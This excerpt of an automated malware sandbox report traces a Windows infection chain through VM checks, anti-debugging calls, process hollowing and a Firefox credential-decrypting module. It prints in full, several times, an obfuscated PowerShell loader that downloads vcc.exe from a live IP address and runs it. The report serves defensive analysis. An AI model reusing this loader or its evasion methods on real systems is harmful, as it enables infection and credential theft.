                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -595313s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -595188s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -595078s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -594967s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -594858s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -594749s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -594640s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -594482s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -594364s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -594235s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -594080s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -593953s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -593837s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_028852F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,6_2_028852F8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599327Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599219Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598999Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598891Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598671Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598563Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598438Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598313Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598188Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598078Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597956Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597828Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597718Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597577Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597433Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597039Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596880Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596750Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596641Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596531Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596421Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596312Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596203Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596094Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595969Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595859Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595750Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595641Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595531Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595422Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595313Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595188Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595078Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594967Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594858Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594749Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594482Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594364Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594080Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 593953Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 593837Jump to behavior
                  Source: powershell.exe, 00000003.00000002.1492553926.0000000004E08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                  Source: powershell.exe, 00000003.00000002.1492553926.0000000004E08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                  Source: daphpvwO.pif, 0000000B.00000002.3828021890.000000002751F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU u
                  Source: powershell.exe, 00000003.00000002.1522620204.0000000008427000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1522620204.00000000084B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000003.00000002.1522620204.00000000084B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                  Source: powershell.exe, 00000003.00000002.1523264828.00000000084DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                  Source: powershell.exe, 00000003.00000002.1476213571.00000000031CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                  Source: powershell.exe, 00000003.00000002.1492553926.0000000004E08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                  Source: powershell.exe, 00000003.00000002.1511309376.000000000752C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: vcc.exe, 00000006.00000002.1465421810.00000000006DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\vcc.exeAPI call chain: ExitProcess graph end nodegraph_6-25749
                  Source: C:\Users\user\Links\daphpvwO.pifAPI call chain: ExitProcess graph end nodegraph_11-55050
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_0289A5B0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,6_2_0289A5B0
                  Source: C:\Users\user\AppData\Roaming\vcc.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_2C03B110 LdrInitializeThunk,LdrInitializeThunk,11_2_2C03B110
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040CE09
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,11_2_004019F0
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02893E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,6_2_02893E20
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_0040ADB0 GetProcessHeap,HeapFree,11_2_0040ADB0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040CE09
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0040E61C
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00416F6A
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_004123F1 SetUnhandledExceptionFilter,11_2_004123F1
                  Source: C:\Users\user\Links\daphpvwO.pifMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Yara matchFile source: amsi32_1956.amsi.csv, type: OTHER
                  Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                  Source: C:\Users\user\AppData\Roaming\vcc.exeMemory allocated: C:\Users\user\Links\daphpvwO.pif base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection unmapped: C:\Users\user\Links\daphpvwO.pif base address: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeMemory written: C:\Users\user\Links\daphpvwO.pif base: 343008Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\vcc.exe "C:\Users\user\AppData\Roaming\vcc.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2571.tmp" "c:\Users\user\AppData\Local\Temp\gbdknv1n\CSCC8613962BFBB4D698240FB82ECB0F974.TMP"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeProcess created: C:\Users\user\Links\daphpvwO.pif C:\\Users\\user\\Links\daphpvwO.pifJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jdzpwvvcwkrhbsagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbbrgqtdflwzsagicagicagicagicagicagicagicagicagicagicagic1tzu1izxjkruzptmlusw9uicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvytg1pbi5ebgwilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbiu0ltsxf0aixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmyvdywxd3ee9vlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagihdwwhasdwludcagicagicagicagicagicagicagicagicagicagicagie11du1ocnljleludfb0ciagicagicagicagicagicagicagicagicagicagicagigz4qnj6znfkclipoycgicagicagicagicagicagicagicagicagicagicagicattkfnrsagicagicagicagicagicagicagicagicagicagicagicjxacigicagicagicagicagicagicagicagicagicagicagicatbmftzvnwyunficagicagicagicagicagicagicagicagicagicagicagwnlrexp2ckvyviagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicaknk9zvujaredtojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljiyny4ymjgumjivodqwl3zjyy5leguilcikzu52okfquerbvefcdmnjlmv4zsismcwwkttzdefsvc1tbevlccgzkttpblzps2utsxrfbsagicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcdmnjlmv4zsi='+[char]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jdzpwvvcwkrhbsagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbbrgqtdflwzsagicagicagicagicagicagicagicagicagicagicagic1tzu1izxjkruzptmlusw9uicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvytg1pbi5ebgwilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbiu0ltsxf0aixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmyvdywxd3ee9vlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagihdwwhasdwludcagicagicagicagicagicagicagicagicagicagicagie11du1ocnljleludfb0ciagicagicagicagicagicagicagicagicagicagicagigz4qnj6znfkclipoycgicagicagicagicagicagicagicagicagicagicagicattkfnrsagicagicagicagicagicagicagicagicagicagicagicjxacigicagicagicagicagicagicagicagicagicagicagicatbmftzvnwyunficagicagicagicagicagicagicagicagicagicagicagwnlrexp2ckvyviagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicaknk9zvujaredtojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljiyny4ymjgumjivodqwl3zjyy5leguilcikzu52okfquerbvefcdmnjlmv4zsismcwwkttzdefsvc1tbevlccgzkttpblzps2utsxrfbsagicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcdmnjlmv4zsi='+[char]34+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jdzpwvvcwkrhbsagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbbrgqtdflwzsagicagicagicagicagicagicagicagicagicagicagic1tzu1izxjkruzptmlusw9uicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvytg1pbi5ebgwilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbiu0ltsxf0aixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmyvdywxd3ee9vlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagihdwwhasdwludcagicagicagicagicagicagicagicagicagicagicagie11du1ocnljleludfb0ciagicagicagicagicagicagicagicagicagicagicagigz4qnj6znfkclipoycgicagicagicagicagicagicagicagicagicagicagicattkfnrsagicagicagicagicagicagicagicagicagicagicagicjxacigicagicagicagicagicagicagicagicagicagicagicatbmftzvnwyunficagicagicagicagicagicagicagicagicagicagicagwnlrexp2ckvyviagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicaknk9zvujaredtojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljiyny4ymjgumjivodqwl3zjyy5leguilcikzu52okfquerbvefcdmnjlmv4zsismcwwkttzdefsvc1tbevlccgzkttpblzps2utsxrfbsagicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcdmnjlmv4zsi='+[char]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jdzpwvvcwkrhbsagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbbrgqtdflwzsagicagicagicagicagicagicagicagicagicagicagic1tzu1izxjkruzptmlusw9uicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvytg1pbi5ebgwilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbiu0ltsxf0aixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmyvdywxd3ee9vlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagihdwwhasdwludcagicagicagicagicagicagicagicagicagicagicagie11du1ocnljleludfb0ciagicagicagicagicagicagicagicagicagicagicagigz4qnj6znfkclipoycgicagicagicagicagicagicagicagicagicagicagicattkfnrsagicagicagicagicagicagicagicagicagicagicagicjxacigicagicagicagicagicagicagicagicagicagicagicatbmftzvnwyunficagicagicagicagicagicagicagicagicagicagicagwnlrexp2ckvyviagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicaknk9zvujaredtojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljiyny4ymjgumjivodqwl3zjyy5leguilcikzu52okfquerbvefcdmnjlmv4zsismcwwkttzdefsvc1tbevlccgzkttpblzps2utsxrfbsagicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcdmnjlmv4zsi='+[char]34+'))')))"Jump to behavior
                  Source: daphpvwO.pif, 0000000B.00000002.3829347045.0000000029430000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829347045.0000000029578000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
                  Source: daphpvwO.pif, 0000000B.00000002.3831052027.000000002D5DE000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: _-Program Manager
                  Source: daphpvwO.pif, 0000000B.00000002.3829347045.0000000029430000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerPrXtM'
                  Source: daphpvwO.pif, 0000000B.00000002.3829347045.0000000029430000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829347045.0000000029578000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: daphpvwO.pif, 0000000B.00000002.3829347045.0000000029430000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerMaXtM'
                  Source: daphpvwO.pif, 0000000B.00000002.3829347045.0000000029430000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829347045.0000000029578000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerXtM'LR
                  Source: daphpvwO.pif, 0000000B.00000002.3829347045.0000000029430000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829347045.0000000029578000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerXtM'
                  Source: daphpvwO.pif, 0000000B.00000002.3829347045.0000000029578000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager,
                  Source: daphpvwO.pif, 0000000B.00000002.3829347045.0000000029430000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerMaXtM'LR
                  Source: daphpvwO.pif, 0000000B.00000002.3829347045.0000000029578000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,6_2_028854BC
